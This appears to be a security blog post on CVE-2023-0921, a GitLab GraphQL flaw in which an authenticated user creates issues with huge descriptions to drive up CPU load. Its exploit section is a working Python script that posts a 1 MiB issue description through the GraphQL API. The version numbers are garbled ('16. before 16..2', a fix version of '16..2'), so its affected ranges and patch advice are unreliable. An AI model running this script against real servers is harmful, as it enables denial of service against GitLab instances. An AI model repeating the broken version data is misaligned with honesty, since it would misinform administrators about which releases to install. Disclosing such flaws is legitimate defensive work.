A newly discovered security vulnerability (CVE-2023-0921) has been identified in GitLab CE/EE, which affects all versions from 8.3 before 15.10.8, 15.11 before 15.11.7, and 16. before 16..2. This vulnerability is caused due to a lack of length validation in the GraphQL implementation, allowing an authenticated attacker to create a large Issue description. When repeatedly requested, this can lead to excessive CPU usage and degraded system performance. In this post, we'll discuss the vulnerability details, the code snippet associated with it, and the original references.

Vulnerability Details

This vulnerability is a result of inadequate length validation for issue descriptions created via the GraphQL API in GitLab. The impact of this vulnerability is twofold. First, an authenticated attacker can create an issue with an excessively large description. Second, when this issue is repeatedly requested using the GraphQL API, the CPU usage increases significantly, consequently affecting the system's performance.

Exploit Details

An attacker can exploit this vulnerability by creating an issue with a large description and then repeatedly requesting this issue using the GraphQL API. The attacker needs to be authenticated to create issues within a project. However, any authenticated user can exploit this vulnerability, making it a serious threat to GitLab instances with a large number of users.

The following code snippet demonstrates how an attacker can create an issue with a large description

import requests

# Replace gitlab_url, project_id, and private_token with appropriate values
gitlab_url = "https://gitlab.example.com";
project_id = "YOUR_PROJECT_ID"
private_token = "YOUR_PRIVATE_TOKEN"

# Generate a large issue description
large_issue_description = "A" * 2**20

# Send API call to create the issue
graphql_query = """
mutation {
  createIssue(input: {
    projectPath: "%s"
    title: "Large issue description test"
    description: "%s"
  }) {
    issue {
      iid
      title
      description
    }
  }
}
""" % (project_id, large_issue_description)

response = requests.post(
  f"{gitlab_url}/api/graphql",
  json={"query": graphql_query},
  headers={"Private-Token": private_token}
)

Original References

- GitLab Security Advisory
- NIST National Vulnerability Database

Mitigation

To mitigate this vulnerability, users must upgrade their GitLab instances to one of the following versions:

16..2

This can be done by following the upgrade instructions provided in the GitLab documentation.

Conclusion

The CVE-2023-0921 vulnerability highlights the importance of input validation, particularly in applications like GitLab with vast and diverse user bases. To secure your GitLab instance, it is highly recommended to upgrade to the latest versions and routinely ensure that your system is protected against new vulnerabilities.

Timeline

Published on: 06/06/2023 17:15:00 UTC
Last modified on: 06/12/2023 18:43:00 UTC